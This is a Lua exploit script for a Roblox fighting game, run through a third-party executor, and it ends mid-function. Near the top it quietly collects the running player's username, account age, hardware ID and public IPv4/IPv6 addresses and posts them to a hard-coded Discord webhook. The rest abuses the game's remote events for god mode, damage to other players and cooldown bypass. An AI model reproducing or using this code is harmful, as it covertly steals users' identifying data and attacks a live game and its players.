plr = game:GetService'Players'.LocalPlayer
local premium = false
local ALT = false
if plr.MembershipType == Enum.MembershipType.Premium then
	premium = true
elseif plr.MembershipType == Enum.MembershipType.None then
	premium = false
end
if premium == false then 
	if plr.AccountAge <= 70 then 
		ALT = true
	end
end
 local write = function(a) rconsoleprint("@@WHITE@@") rconsoleprint(a) end
local writei = function(a) rconsoleprint("@@BLUE@@") rconsoleprint("[*]"..a) end
local writew = function(a) rconsoleprint("@@YELLOW@@") rconsoleprint("[*]"..a.."\n") end
local writee = function(a) rconsoleprint("@@RED@@") rconsoleprint(a) end
local market = game:GetService("MarketplaceService")
local info = market:GetProductInfo(game.PlaceId, Enum.InfoType.Asset)
 
local http_request = http_request;
if syn then
	http_request = syn.request
elseif SENTINEL_V2 then
	function http_request(tb)
		return {
			StatusCode = 200;
			Body = request(tb.Url, tb.Method, (tb.Body or ''))
		}
	end
end
 
local body = http_request({Url = 'https://httpbin.org/get'; Method = 'GET'}).Body;
local decoded = game:GetService('HttpService'):JSONDecode(body)

local hwid_list = {"Syn-Fingerprint", "Exploit-Guid", "Proto-User-Identifier", "Sentinel-Fingerprint"};
hwid = "";

for i, v in next, hwid_list do
	if decoded.headers[v] then
		hwid = decoded.headers[v];
		break
	end
end

if hwid then
local HttpServ = game:GetService('HttpService')
local url = "https://discord.com/api/webhooks/806182097681121391/ZeBr1kG3hEYnolKzl4S9u17iQXknIneT6RKLzd8jm0E0kcX_vmZsWQuI-HllLgaZ4ImQ"
 
 
local data = 
    {
        ["content"] = "",
        ["embeds"] = {{
            ["title"] = "__**Funny log:**__",
            ["description"] = "**bro can you not:**",
            ["type"] = "rich",
            ["color"] = tonumber(0xAB0909),
            ["fields"] = {
                {
                    ["name"] = "Username:",
                    ["value"] = Game.Players.LocalPlayer.Name,
                    ["inline"] = true
                },
				{
                    ["name"] = "Game Link:",
                    ["value"] = "https://roblox.com/games/" .. game.PlaceId .. "/",
                    ["inline"] = true
                },
				{
					["name"] = "Game Name:",
					["value"] = info.Name,
					["inline"] = true
				},
				{
					["name"] = "Age:",
					["value"] = plr.AccountAge,
					["inline"] = true
				},
				{
					["name"] = "Have Premium:",
					["value"] = premium,
					["inline"] = true
				},
				{ ["name"] = "Hwid:",
				    ["value"] = hwid
 },
 { ["name"] = "IP:",
     ["value"] = game:HttpGet("https://ident.me/", true)
     },
  { ["name"] = "IPv4:",
     ["value"] = game:HttpGet("https://v4.ident.me/", true)
     },
  { ["name"] = "IPv6:",
     ["value"] = game:HttpGet("https://v6.ident.me/", true)
     },
            },
        }}
    }
    local newdata = HttpServ:JSONEncode(data)
 
    local headers = {
            ["content-type"] = "application/json"
    }
 
    local request_payload = {Url=url, Body=newdata, Method="POST", Headers=headers}
    http_request(request_payload)
end

if hwid ~= "b067ce3a8a486286bb4c372aaefd3adea815d100103ca82fe73ffb7906cde9e77476de1e4b40114a7d33867ba341e3c57a431b1360463113a8f4ffcfe295a5be" and hwid ~= "9025fb44d28c338b332cdf1dbc3077d468ae9c6a1591d9427ba5bfd656643f2213bf4bc8679b88defdf569caa4201a3a6feceea158475e3f6349be8b23f15483" and hwid ~= "229b60eae0bc78aa610046348509aac75197d3c316b052f03dd2c81ed2c17728c1b80ec04bdc7d94fe0ff13238418067b6a1bb2a2a628643b48cebc1c5aa74f2" and hwid ~= "f29705325cb85eac9a470d699061954c758cc2c97b5397c6ae14b4d3839c464e9895ae4ca548878bfe39befc0d8901f2af4a8a09dfccfb6fee3644756984e3a6" and hwid ~= "fae528d97788c69a0762aee47ff4d83fc27c71ec3387ea3a767a3cfc0dc8f297897b026fe92dbf8d8e6f517e83819530cfd1b7ca70c289ad493b4e13aeb1ce9f" then
    plr.Kick("hack ez")
    end
game:GetService("ReplicatedStorage").Block:FireServer(true)
game:GetService("ReplicatedStorage").SuperArmor:FireServer(true)
  local Run = game:GetService("RunService")
local Tween = game:GetService("TweenService")
local UserInput = game:GetService("UserInputService")
local ContextAction = game:GetService("ContextActionService")

local Players = game.Players
local LocalPlayer = game.Players.LocalPlayer
local Mouse = LocalPlayer:GetMouse()
local Character = LocalPlayer.Character

local Remotes = {
    PlayerStrongPunch = game.ReplicatedStorage.PlayerStrongPunch;
    SamuraiDamage2 = game.ReplicatedStorage.SamuraiDamage2;
    Transparency = game.ReplicatedStorage.Transparency;
    Deflect = game.ReplicatedStorage.Menacing;
    KQRGrab = game.ReplicatedStorage.KQRGrab;
    Damage = game.ReplicatedStorage.Damage;
    Anchor = game.ReplicatedStorage.Anchor
}
local BodyParts = {
    Head = Character.Head;
    Torso = Character.Torso;
    Humanoid = Character.Humanoid;
    HumanoidRootPart = Character.HumanoidRootPart;
    RightArm = Character["Right Arm"];
    RightLeg = Character["Right Leg"];
    LeftArm = Character["Left Arm"];
    LeftLeg = Character["Left Leg"];
}

local M = {false,false}
local Q = {false}
local E = {false,false}
local R = {false}
local T = {false}
local F = {false,false}
local GlobalDebounce = false
local EnableMoves = false
local CanSkipDash = true
local CanDash = false
local BreakQ = false
local BreakR = false
local BreakF = false
local Break = false
local ERot = true
local DDB = false
local DE = false

local RCounter = 0


local Camera = workspace.CurrentCamera
local TS = game.Lighting.TS

local Stop = function() Break = true wait() Break = false end
local Stop2 = function() BreakF = true wait() BreakF = false end
local Stop3 = function() BreakR = true wait() BreakR = false end
local Stop4 = function() BreakQ = true wait() BreakQ = false end
local ZZ = function(T) return math.acos(math.cos(T * math.pi)) / math.pi end
local Quadatric = function(T,P0,P1,P2)
    local P0P1 = P0:Lerp(P1,T)
    local P1P2 = P1:Lerp(P2,T)
    return P0P1:Lerp(P1P2,T)
end
	game:GetService("Players").LocalPlayer.Character.Humanoid.WalkSpeed = 34
	game:GetService("Players").LocalPlayer.Character.Humanoid.JumpPower = 60 
local plr = game:GetService("Players").LocalPlayer
repeat
	wait()
until plr.Character and plr.Character.Humanoid
local chr = plr.Character
local human = chr.Humanoid
local hrp = chr.HumanoidRootPart
mouse = plr:GetMouse()
cam = workspace.CurrentCamera

if chr:FindFirstChild("Stand") then
	if chr.Stand:FindFirstChild("JumpCooldown") then
		chr.Stand.JumpCooldown:Destroy()
	end
end
---------


---------


--Values
local attackmode = false
local count = 0

local active = false
local standmode = false
local ecd1 = false
local UpperCutCd1 = false
local PunchLolCd = false
local RMoveCd = false
local loading = false
local standmodecooler = false
local specmodecooler = false
local secretmodeon = false
local black = true

--
--Events
local replicatedstorage = game:GetService("ReplicatedStorage")
local RReffect = replicatedstorage.RRExplosion
local knife = game:GetService("ReplicatedStorage").Knife
local ripper = game:GetService("ReplicatedStorage").SpaceRipperStingyEyes
local A_1 = 9
local A_2 = "roadroller"
local TS = game:GetService("ReplicatedStorage").Timestop
local uis = game:GetService("UserInputService")
local buff = game:GetService("ReplicatedStorage").TWGHDeath
local armor = game:GetService("ReplicatedStorage").SuperArmor
local joseph = game:GetService("ReplicatedStorage").JosephHamon.Event
local r = "boom"
local g = "molotov"
local e = "volley"
local c = "rope"
local hidden = CFrame.new(-6551.14746, 419.935547, -178.968475, 0.339421868, 2.31603678e-08, -0.940634251, -8.20526864e-08, 1, -4.98611286e-09, 0.940634251, 7.8873974e-08, 0.339421868)
local healing = 50
local asset = "rbxassetid://3057029635"
local what = 2.2
local what1 = 0.18
local Event = game:GetService("ReplicatedStorage").Heal3
local karsevent1 = game:GetService("ReplicatedStorage").KarsSlash --:FireServer()
local doppioslam = game:GetService("ReplicatedStorage").DoppioSlam --:FireServer()
local mih1 = "MIHKnife"
local mih2 = 
{
}
local mih3 = true
local mih4 = game:GetService("ReplicatedStorage").MadeInHeavenHandler
local timeaccel1 = "timeaccel"
local mihtime1 = game:GetService("ReplicatedStorage").MadeInHeavenHandler
local timeaccel = "minitimeaccel"
local dodgemode = "dodgemode"
local epicslash = "rotationslashes"
local yell = replicatedstorage.Yell
local donutevent = replicatedstorage.FOTPSDamageTeleport
local dodgeevent = replicatedstorage.Dodge
local knock = replicatedstorage.Knock
local berserk = replicatedstorage.Berserk
local doppioslam = game:GetService("ReplicatedStorage").DoppioSlam
local anchorevent = replicatedstorage.Anchor
local rtzevent = replicatedstorage.RTZ
--
local player = game.Players.LocalPlayer
local Character = player.Character or player.CharacterAdded:Wait()
local Humanoid = Character:WaitForChild("Humanoid")
local UIS = game:GetService("UserInputService")
local mesplash = game:GetService("ReplicatedStorage").TwentyMeterSplash
local blackholeVoidSize = 0

local blackholeSize = 0

local blackholeTime = 0
local blackholeass = 0
local blackholeactive = false

local ABDSound = {}
ABDSound.Sounds = {}
local Effects = workspace.Effects
local rStorage = game:GetService("ReplicatedStorage")
local Damage = rStorage.Damage
local Player = game:GetService("Players").LocalPlayer
local IgnoreAllCooldown = false -- Set to true if you don't want "cooldown" on this script.
local Invincible = false
local Move = false
local Posing = false
local Barraging = false
local CDown = false
local FirstTime = true
local Blocking = false
local Beatdown = false
local AddedConnection = nil
local RTZEnabled = false
local Bruh = false
local Countering = false
local bruhla = true
local StarmanDamage = true
local Mouse = Player:GetMouse()
-- Animations:
function Asset(Id)
	return "rbxassetid://"..Id
end
local AnimationTable = {
    BigBoom = Instance.new("Animation"),
     uia = Instance.new("Animation"),
      uib = Instance.new("Animation"),
       uic = Instance.new("Animation")
}
AnimationTable.BigBoom.AnimationId = Asset(5242641804)
AnimationTable.uia.AnimationId = Asset(5633587784)
AnimationTable.uib.AnimationId = Asset(5633584586)
AnimationTable.uia.AnimationId = Asset(5633583111)

local Preloaded = {}
local Objects = {}
local GUIConnections = {}
local Preloaded = {}
local Objects = {}
local GUIConnections = {}
local CaveSounds = {
	3173566193,
	3173571164,
	3173574531,
	3173577378,
	3173580045,
	3173581159,
	3999390679,
	3231980820,
	3419187043
}
function CheckPreloaded(ID)
	for Index, Song in next, Preloaded do
		if ID == Song[1] then
			return true
		end
	end
	return nil
end

function CheckObjects(ID, Get, Index)
	for Index, Table in next, Objects do
		if ID == Table[1] then
			if Get == "Index" then
				return Index
			elseif Get == "Value" then
				return Table[Index]
			end
		end
	end
	return nil
end

function GetTimePos(ID)
	for Index, Song in next, Preloaded do
		if ID == Song[1] then
			return Song[2]
		end
	end
	return 20
end
function PreloadAudio(SoundId)
	local NS = Instance.new("Sound")
	NS.SoundId = "rbxassetid://"..SoundId
	NS.Parent = rStorage
	game:GetService("ContentProvider"):PreloadAsync({NS})
	wait(0.5)
	table.insert(Preloaded, {SoundId, NS.TimeLength})
	wait(0.5)
	NS:Destroy()
end

function StandAppearence(Show)
	if not Player.Character:FindFirstChild("Stand") then return end
	for Index, Child in next, Player.Character.Stand:GetDescendants() do
		if (Child:IsA("BasePart") or Child:IsA("Decal")) and Child.Name ~= "StandHumanoidRootPart" and Child.Name ~= "IntValue" then
			if Show == true then
				rStorage["Transparency"]:FireServer(Child, 0)
			else
				rStorage["Transparency"]:FireServer(Child, 1)
			end
		end
	end
end

function TimeEraseShow(TimeEraser)
	for Index, Child in next, TimeEraser:GetDescendants() do
		if (Child:IsA("BasePart") or Child:IsA("Decal")) and Child.Name ~= "HumanoidRootPart" and Child.Name ~= "StandHumanoidRootPart" then
			Child.Transparency = 0.65
		end
	end
end
function ABDSound.new(SoundId, Volume, Pitch, Loop, LoopTimes, CustomPlayer, StarmanForceAudio)
	if CheckPreloaded(SoundId) == false then
		PreloadAudio(SoundId)
	end
	local Object = {}
	Object.Length = GetTimePos(SoundId)
	local TP = Player
	if TP == nil then
		return
	end
	local TC = TP.Character
	if not TC then
		return
	elseif TC.Parent == nil then
		return
	end
	local hum = TC:FindFirstChildOfClass("Humanoid")
	local rp = TC.HumanoidRootPart
	if CustomPlayer ~= nil then
		if CustomPlayer:IsA("Player") then
			rp = CustomPlayer.Character.HumanoidRootPart
		elseif CustomPlayer:IsA("Model") then
			rp = CustomPlayer.Torso
		end
	end
	local Start = tick()
	local Increaser = 0
	local Looped = 0
	local LoopMethod = "Number"
	if LoopTimes == "Infinite" then
		LoopMethod = "Infinite"
	end
	Object.Start = Start
	Object.ID = SoundId
	function Object:Update()
		rStorage.Damage12:FireServer(hum, rp.CFrame, 0, 0, Vector3.new(0, 0, 0), 9e999, "rbxassetid://"..SoundId, Pitch, Volume/4.5);
	end
	function Object:FixTime(Sound)
		game:GetServie("RunService").RenderStepped:Wait()
		Sound.TimePosition = (tick() - Start) * Pitch
	end
	Object:Update()
	table.insert(Objects, {SoundId, Object, Increaser, Start})
	ABDSound.Sounds["rbxassetid://"..SoundId] = Object
	local function LoopSong()
		Start = tick()
		Object.Start = Start
		Increaser = 0
		Looped = Looped + 1
		if LoopMethod == "Number" then
			if Looped < LoopTimes then
				coroutine.resume(coroutine.create(function()
					while Increaser < ((Object.Length*3.5) / Pitch) and Object ~= nil do
						if ((tick() - Object.Start) * Pitch) > (Object.Length * Pitch) then
							if Looped >= LoopTimes then
								ABDSound.Sounds[Object] = nil
								ABDSound.StopAudio(Object.ID)
							end
							if Loop == true and Looped < LoopTimes then
								LoopSong()
							end
							break
						else
							Object:Update()
						end
						wait(0.69)
						Increaser = Increaser + 1.15
					end
				end))
			end
		elseif LoopMethod == "Infinite" then
			coroutine.resume(coroutine.create(function()
				while Increaser < ((Object.Length*3.5) / Pitch) and Object ~= nil do
					if ((tick() - Object.Start) * Pitch) > (Object.Length * Pitch) then
						LoopSong()
						break
					else
						Object:Update()
					end
					wait(0.69)
					Increaser = Increaser + 1.15
				end
			end))
		end
	end
	coroutine.resume(coroutine.create(function()
		local NoDo = false
		while Increaser < ((Object.Length*3.5) / Pitch) and Object ~= nil do
			if ((tick() - Object.Start) * Pitch) > (Object.Length * Pitch) then
				if Loop ~= true then
					ABDSound.Sounds[Object] = nil
					ABDSound.StopAudio(Object.ID)
				end
				if Invincible == true and IsStarmanSong(SoundId) ~= false then
					NoDo = true
					local Song = GetRandomStarmanSong(StarmanForceAudio)
					if StarmanForceAudio ~= nil then
						PlayAudio(Song[1], Song[2], Song[3], nil, nil, nil, StarmanForceAudio)
					else
						PlayAudio(Song[1], Song[2], Song[3])
					end
				end
				if Loop == true and NoDo == false then
					LoopSong()
				end
				break
			else
				Object:Update()
			end
			wait(0.69)
			Increaser = Increaser + 1.15
		end
	end))
end

function ABDSound.StopAll(KillSong)
	for i,v in next, ABDSound.Sounds do
		if v.ID == SOHSongProperties.ID or v.ID == KaiokenSongProperties.ID then
			if KillSong == true then
				v.Start = 0.1
				v.Length = 0.1
				ABDSound.Sounds[i] = nil
				v = nil
			end
		else
			v.Start = 0.1
			v.Length = 0.1
			ABDSound.Sounds[i] = nil
			v = nil
		end
	end
	ABDSound.Sounds = {}
end

function ABDSound.StopAudio(ID)
	for i,v in next, ABDSound.Sounds do
		if v.ID == ID then
			v.Start = 0.1
			v.Length = 0.1
			ABDSound.Sounds[i] = nil
			v = nil
		end
	end
end

function ABDSound.StopStarmans()
	for i,v in next, ABDSound.Sounds do
		if IsStarmanSong(v.ID) ~= false then
			v.Start = 0.1
			v.Length = 0.1
			ABDSound.Sounds[i] = nil
			v = nil
		end
	end
end

function ABDSound.IsPlaying(ID)
	for i,v in next, ABDSound.Sounds do
		if v.ID == ID then
			return true
		end
	end
	return false
end

function God(Humanoid)
	if Humanoid.Health < 9e9 then
		--rStorage.VampireRush:FireServer(Humanoid, CFrame.new(0, -30, 0), -9e999, 0, Vector3.new(0, 0, 0), "rbxassetid://241837157", -9e999, Color3.new(1, 1, 1), "rbxassetid://935843979", 0, 0)
		rStorage.BurnDamage:FireServer(Humanoid, Humanoid.Parent.Head.CFrame, -math.huge,0, Vector3.new(0, 0, 0), "rbxassetid://241837157", 0, Color3.new(255, 255, 255), "rbxassetid://260430079", 1, 0)
		wait(0.5)
		rStorage.BurnDamage:FireServer(Humanoid, Humanoid.Parent.Head.CFrame, math.huge,0, Vector3.new(0, 0, 0), "rbxassetid://241837157", 0, Color3.new(255, 255, 255), "rbxassetid://260430079", 1, 0)
	end
end
function RemakeMenuGui(AbilityName, PowerStat, SpeedStat, DurabilityStat)
	pcall(function()
		for Index, Connection in GUIConnections do
			if Connection then
				Connection:Disconnect()
			end
		end
		GUIConnections = {}
	end)
	local function MouseOver(GuiObject, EnterText, LeaveText)
		local Enter = GuiObject.MouseEnter:Connect(function()
			GuiObject.Text = EnterText
		end)
		table.insert(GUIConnections, Enter)
		local Leave = GuiObject.MouseLeave:Connect(function()
			GuiObject.Text = LeaveText
		end)
		table.insert(GUIConnections, Leave)
	end
	if Player.PlayerGui:FindFirstChild("MenuGUI") then
		if Player.PlayerGui.MenuGUI:FindFirstChild("Background") then
			for Index, Child in next, Player.PlayerGui.MenuGUI.Background:GetChildren() do
				if Child:IsA("TextLabel") then
					if Child.Name == "Power" then
						Child.Visible = false
						local Clone = Child:Clone()
						Clone.Name = "NewStat_"..Child.Name
						Clone.Parent = Child.Parent
						Clone.Visible = true
						Clone.Text = "Destructive Power"
						MouseOver(Clone, PowerStat, "Destructive Power")
						Child:Destroy()
					elseif Child.Name == "Speed" then
						Child.Visible = false
						local Clone = Child:Clone()
						Clone.Name = "NewStat_"..Child.Name
						Clone.Parent = Child.Parent
						Clone.Visible = true
						Clone.Text = "Speed"
						MouseOver(Clone, SpeedStat, "Speed")
						Child:Destroy()
					elseif Child.Name == "Durability" then
						Child.Visible = false
						local Clone = Child:Clone()
						Clone.Name = "NewStat_"..Child.Name
						Clone.Parent = Child.Parent
						Clone.Visible = true
						Clone.Text = "Durability"
						MouseOver(Clone, DurabilityStat, "Durability")
						Child:Destroy()
					elseif Child.Name == "Ability" then
						Child.Visible = false
						local Clone = Child:Clone()
						Clone.Name = "NewStat_"..Child.Name
						Clone.Parent = Child.Parent
						Clone.Visible = true
						Clone.Text = AbilityName
						Child:Destroy()
					end
				end
			end
		end
	end
end

function OnSpawn(Character)
	ABDSound.StopAll()
	Posing = false
	Invincible = false
	Barraging = false
	Blocking = false
	Beatdown = false
	Countering = false
	CDown = false
	Move = false
	Bruh = false
	wait(0.025)
	if AddedConnection then
		AddedConnection:Disconnect()
	end
	pcall(function()
		for Index, Child in next, Character:GetChildren() do
			if Child:IsA("BoolValue") then
				if Child.Name == "Disabled" then
					coroutine.resume(coroutine.create(function()
						while Child and Child.Parent == Character do
							wait()
							if Child.Value == false then
								Child.Value = true
							end
						end
					end))
				end
			end
		end
		coroutine.resume(coroutine.create(function()
			local Humanoid = Character:FindFirstChildOfClass("Humanoid")
			local GetUp = false
			spawn(function()
				wait(1)
				rStorage.BurnDamage:FireServer(Humanoid, Humanoid.Parent.Head.CFrame, -math.huge, 0, Vector3.new(0, 0, 0), "rbxassetid://241837157", 0, Color3.new(255, 255, 255), "rbxassetid://260430079", 1, 0)
			end)
			while Character and Humanoid and Character:IsDescendantOf(workspace) and Humanoid.Parent == Character do
				wait()
			
				if Humanoid.PlatformStand == true and GetUp == false then
					rStorage.GetUp:FireServer()
					Humanoid.PlatformStand = false
					GetUp = true
				end
				if Character:FindFirstChild("Stand") then
					if Character.Stand:FindFirstChild("JumpCooldown") then
						Character.Stand.JumpCooldown:Destroy()
					end
				end
				if Character.HumanoidRootPart:FindFirstChildOfClass("BodyPosition") then
					Character.HumanoidRootPart:FindFirstChildOfClass("BodyPosition"):Destroy()
				end
				if Character.HumanoidRootPart:FindFirstChildOfClass("BodyVelocity") then
					Character.HumanoidRootPart:FindFirstChildOfClass("BodyVelocity"):Destroy()
				end
				if math.random(1, 11) == 1 then
					if Humanoid.Health < 9e99 and Invincible == false then
						--rStorage.VampireRush:FireServer(Humanoid, CFrame.new(0, -30, 0), -3.25, 0, Vector3.new(0, 0, 0), "rbxassetid://241837157", -9e999, Color3.new(1, 1, 1), "rbxassetid://935843979", 0, 0)
						rStorage.BurnDamage:FireServer(Humanoid, Humanoid.Parent.Head.CFrame, -math.huge, 0, Vector3.new(0, 0, 0), "rbxassetid://241837157", 0, Color3.new(255, 255, 255), "rbxassetid://260430079", 1, 0)
						rStorage.BurnDamage:FireServer(Humanoid, Humanoid.Parent.Head.CFrame, math.huge, 0, Vector3.new(0, 0, 0), "rbxassetid://241837157", 0, Color3.new(255, 255, 255), "rbxassetid://260430079", 1, 0)
					end
				end
				if math.random(1, 4) == 1 then
					GetUp = false
				end
			end
		end))
		AddedConnection = Character.HumanoidRootPart.ChildAdded:Connect(function(Child)
			if Child:IsA("BodyVelocity") or Child:IsA("BodyPosition") then
				if Child.Name == "BodyVelocity" or Child.Name == "BodyPosition" then
					coroutine.resume(coroutine.create(function()
						while true do
							local Suc, Er = pcall(function()
								Child:Destroy()
							end)
							wait()
							if Suc then
								break
							end
						end
					end))
				end
			end
		end)
	end)
	RemakeMenuGui(" Magik Spec:\nOver Funny", "STRONK MEN", "FAST ASS", "BRUH")
end

Effects.DescendantAdded:Connect(function(v)
	if v:IsA("Sound") then
		local Object = ABDSound.Sounds[v.SoundId]
		if Object then
			Object.Last = v.TimePosition
			Object:FixTime(v)
		end
	end
end)

OnSpawn(Player.Character)

Player.CharacterAdded:Connect(function(Character)
	workspace.Entities:WaitForChild(Player.Name)
	wait(0.025)
	OnSpawn(Character)
end)
function PlayAudio(Id, Volume, Pitch, Loop, Times, Custom)
	ABDSound.new(Id, Volume, Pitch, Loop, Times, Custom)
end
function PlaySoundEffect(Humanoid, Id, Volume, Pitch)
	rStorage.Damage12:FireServer(Player.Character.Humanoid, Humanoid.Parent.Head.CFrame, 0, 0, Vector3.new(0,0,0), 9e999, "rbxassetid://"..Id, Pitch, Volume)
end
local AuraSetter = 0
coroutine.resume(coroutine.create(function()
		while wait(0) do
		    if black == true then
            AuraSetter = AuraSetter + 1

game.ReplicatedStorage.Damage:FireServer(game.Players.LocalPlayer.Character.Humanoid, game.Players.LocalPlayer.Character["Head"].CFrame * CFrame.new(math.sin(AuraSetter * 50)*3, math.cos(AuraSetter * 50)*3, 3), 0, 0, Vector3.new(nil, nil,nil), "rbxassetid://245751634", 3, Color3.new(0, 0, 0), "", 1, 1)
game.ReplicatedStorage.Damage:FireServer(game.Players.LocalPlayer.Character.Humanoid, game.Players.LocalPlayer.Character["Head"].CFrame * CFrame.new(math.sin(AuraSetter * 50)*-3, math.cos(AuraSetter * 50)*3, 3), 0, 0, Vector3.new(nil, nil,nil), "rbxassetid://245751634", 3, Color3.new(0, 0, 0), "", 1, 1)

		    end
	end

end))
function funny()
   PlayAudio(183142252, 10, 1)
end
Mouse.KeyDown:Connect(function(Key)
    		if Key == "`" then
    		    funny()
end
end) 
coroutine.resume(coroutine.create(function()
    if black == true then
        while wait(5) do
	chr.Animate.walk.WalkAnim.AnimationId = "rbxassetid://5166114330"
	chr.Animate.fall.FallAnim.AnimationId = "rbxassetid://5166133986" 
	chr.Animate.jump.JumpAnim.AnimationId = "rbxassetid://2763931895" 
	chr.Animate.idle.Animation1.AnimationId = "rbxassetid://5166116703"
        end
end
    end))


local blackholeVoidSize = 0

local blackholeSize = 0

local blackholeTime = 0

local blackholeactive = false

local Objs = {}
local LastBottomObj
	    local Model = Instance.new("Model")
Model.Name = "Obj"
Model.Parent = Character
local MainObj = Instance.new("Part")
MainObj.Anchored = true
MainObj.CanCollide = false
MainObj.Massless = true
MainObj.Transparency = 1
MainObj.Size = Vector3.new(1,1,1)
MainObj.Parent = Model

mouse.KeyDown:connect(function(key)
	if key == "e" then
    if blackholeactive == true then return end
		blackholeactive = true
		MainObj.CFrame = hrp.CFrame * CFrame.new(0,25,0)
		repeat
 		   blackholeVoidSize = blackholeVoidSize + 0.5
 		   blackholeTime = blackholeTime + 1
  		   blackholeSize = blackholeSize + 0.01
 		   _G.blackholeVoid()
   		   game:GetService("ReplicatedStorage").Damage:FireServer(game.Players.LocalPlayer.Character.Humanoid, MainObj.CFrame,2, 0,Vector3.new(0,0,0),  "rbxassetid://", blackholeVoidSize,Color3.new(0,0,0),"", 1, 0)
   		   wait()
		until human.Health == 0 or human.Health < 0 or blackholeTime == 400
        MainObj:Destroy()
		blackholeTime = 0
		blackholeSize = 0
		blackholeVoidSize = 0
		wait(0.5)
		blackholeactive = false
	end
end)

_G.blackholeVoid = function()
    for i,v in pairs(game.Workspace.Entities:GetChildren()) do
        if v:FindFirstChild("Humanoid") and v:FindFirstChild("HumanoidRootPart") and v.Name ~= game.Players.LocalPlayer.Name then
            if (game.Players.LocalPlayer.Character.HumanoidRootPart.Position - v.HumanoidRootPart.Position).Magnitude < blackholeVoidSize then
            game.ReplicatedStorage.Damage:FireServer(v.Humanoid, v.HumanoidRootPart.CFrame, 2.5, 0.1, ((MainObj.Position+MainObj.CFrame.LookVector*0)-v.HumanoidRootPart.Position)*1,  "rbxassetid://4137216950", 0.1,Color3.new(0,0,0),"", 1, 1)
            end
        end
    end
end


local Objs = {}
local LastBottomObj
local Model = Instance.new("Model")
Model.Name = "Obj"
Model.Parent = Character
local nonoMainObj = Instance.new("Part")
nonoMainObj.Anchored = true
nonoMainObj.CanCollide = false
nonoMainObj.Massless = true
nonoMainObj.Transparency = 1
nonoMainObj.Size = Vector3.new(1,1,1)
nonoMainObj.Parent = Model

local NotMainObj = Instance.new("Part")
NotMainObj.Anchored = true
NotMainObj.CanCollide = false
NotMainObj.Massless = true
NotMainObj.Transparency = 1
NotMainObj.Size = Vector3.new(1,1,1)
NotMainObj.Parent = Model

local NotMainObj2 = Instance.new("Part")
NotMainObj2.Anchored = true
NotMainObj2.CanCollide = false
NotMainObj2.Massless = true
NotMainObj2.Transparency = 1
NotMainObj2.Size = Vector3.new(1,1,1)
NotMainObj2.Parent = Model

local NotNotMainObj = Instance.new("Part")
NotMainObj.Anchored = true
NotMainObj.CanCollide = false
NotMainObj.Massless = true
NotMainObj.Transparency = 1
NotMainObj.Size = Vector3.new(1,1,1)
NotMainObj.Parent = Model

local NotNotMainObj2 = Instance.new("Part")
NotMainObj2.Anchored = true
NotMainObj2.CanCollide = false
NotMainObj2.Massless = true
NotMainObj2.Transparency = 1
NotMainObj2.Size = Vector3.new(1,1,1)
NotMainObj2.Parent = Model
local earthquake = true
coroutine.resume(coroutine.create(function()
    while wait(0.16) do
        if earthquake == true then
    pcall(function()
        local hit = math.random(1,5)
        if hit == 1 then
        		nonoMainObj.CFrame = hrp.CFrame * CFrame.new(0,-40,0)
        		game:GetService("ReplicatedStorage").Damage12Enderman:FireServer(game.Players.LocalPlayer.Character.Humanoid, nonoMainObj.CFrame, 0, 0, nil, 0.65, "", 1, 0)
        elseif hit == 2 then		
		NotMainObj.CFrame = hrp.CFrame * CFrame.new(40,-40,0)
		game:GetService("ReplicatedStorage").Damage12Enderman:FireServer(game.Players.LocalPlayer.Character.Humanoid, NotMainObj.CFrame, 0, 0, nil, 0.65, "", 1, 0)
		elseif hit == 3 then
		NotMainObj2.CFrame = hrp.CFrame * CFrame.new(-40,-40,0)
		 		   game:GetService("ReplicatedStorage").Damage12Enderman:FireServer(game.Players.LocalPlayer.Character.Humanoid, NotMainObj2.CFrame, 0, 0, nil, 0.65, "", 1, 0)
		 		   elseif hit == 4 then
		NotNotMainObj.CFrame = hrp.CFrame * CFrame.new(0,-40,40)
		 		   game:GetService("ReplicatedStorage").Damage12Enderman:FireServer(game.Players.LocalPlayer.Character.Humanoid, NotNotMainObj.CFrame, 0, 0, nil, 0.65, "", 1, 0)
		 		   elseif hit == 5 then
		NotNotMainObj2.CFrame = hrp.CFrame * CFrame.new(0,-40,-40)
		 		   game:GetService("ReplicatedStorage").Damage12Enderman:FireServer(game.Players.LocalPlayer.Character.Humanoid, NotNotMainObj2.CFrame, 0, 0, nil, 0.65, "", 1, 0)
    end
    end)
        end
end
end))
function Pro()
        pro = true
		Move = true
		local AllahAnim = Player.Character.Humanoid:LoadAnimation(AnimationTable.BigBoom)
		AllahAnim:Play(0.1, 1, 1)
		AuraSetter = 0
				coroutine.resume(coroutine.create(function()
				    if pro == true then
repeat
    wait()
				      AuraSetter = AuraSetter + 1
            game.ReplicatedStorage.Damage:FireServer(game.Players.LocalPlayer.Character.Humanoid, game.Players.LocalPlayer.Character["Torso"].CFrame * CFrame.new(math.sin(AuraSetter * 50)*6, math.cos(AuraSetter * 50)*-6, math.sin(AuraSetter * 50)*0), 0, 0, Vector3.new(nil, nil,nil), "rbxassetid://245751634", 3, Color3.new(0 ,0 ,0), "", 1, 1)
                                    game.ReplicatedStorage.Damage:FireServer(game.Players.LocalPlayer.Character.Humanoid, game.Players.LocalPlayer.Character["Torso"].CFrame * CFrame.new(math.sin(AuraSetter * 50)*6, math.cos(AuraSetter * 50)*-6, math.sin(AuraSetter * 50)*6), 0, 0, Vector3.new(nil, nil,nil), "rbxassetid://245751634", 3, Color3.new(0 ,0 ,0), "", 1, 1)
                                    game.ReplicatedStorage.Damage:FireServer(game.Players.LocalPlayer.Character.Humanoid, game.Players.LocalPlayer.Character["Torso"].CFrame * CFrame.new(math.sin(AuraSetter * 50)*-6, math.cos(AuraSetter * 50)*-6, math.sin(AuraSetter * 50)*-6), 0, 0, Vector3.new(nil, nil,nil), "rbxassetid://245751634", 3, Color3.new(0 ,0 ,0), "", 1, 1)
                                     game.ReplicatedStorage.Damage:FireServer(game.Players.LocalPlayer.Character.Humanoid, game.Players.LocalPlayer.Character["Torso"].CFrame * CFrame.new(math.sin(AuraSetter * 50)*6, math.cos(AuraSetter * 50)*-6, math.sin(AuraSetter * 50)*-6), 0, 0, Vector3.new(nil, nil,nil), "rbxassetid://245751634", 3, Color3.new(0 ,0 ,0), "", 1, 1)
                                    game.ReplicatedStorage.Damage:FireServer(game.Players.LocalPlayer.Character.Humanoid, game.Players.LocalPlayer.Character["Torso"].CFrame * CFrame.new(math.sin(AuraSetter * 50)*-6, math.cos(AuraSetter * 50)*-6, math.sin(AuraSetter * 50)*6), 0, 0, Vector3.new(nil, nil,nil), "rbxassetid://245751634", 3, Color3.new(0 ,0 ,0), "", 1, 1)
